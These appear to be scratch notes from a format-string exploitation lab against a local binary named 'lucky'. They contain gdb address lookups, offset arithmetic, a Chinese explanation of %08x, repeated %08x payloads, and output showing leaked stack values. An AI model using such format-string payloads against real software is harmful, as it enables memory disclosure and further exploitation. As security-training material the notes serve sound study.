(gdb) p &c
$3 = (int *) 0x601048 <c>

(gdb) p &buf
$4 = (char (*)[100]) 0x7fffffffe3f0

0x18 = 24 24/6 = 4
0x70 = 112 112/4=28  28-1=27
112/8 = 14 -1 =13
0x64 = 100 24

%08x为整型以16进制方式输出的格式字符串，会把后续对应参数的整型数字，以16进制输出。08的含义为，输出的16进制值占8位，不足部分左侧补0。
[%08x][%08x][%08x][%08x][%08x][%08x][%08x][%08x][%08x][%08x][%08x][%08x][%08x][%08x][%08x][%08x][%08x][%08x][%08x][%08x][%08x][%08x]%08x
vagrant@vagrant:/vagrant$ ./lucky < input.txt
[2fa9df30][5c43b8d0][0000001f][00000000][00000000][3830255b][5d783830][255b5d78][3830255b][5d783830][255b5d78][3830255b][5d783830][255b5d78][3830255b][5d783830][


[%08x][%08x][%08x][%08x][%08x][%08x][%08x][%08x][%08x][%08x][%08x][%08x][%08x][%08x][%08x]%08x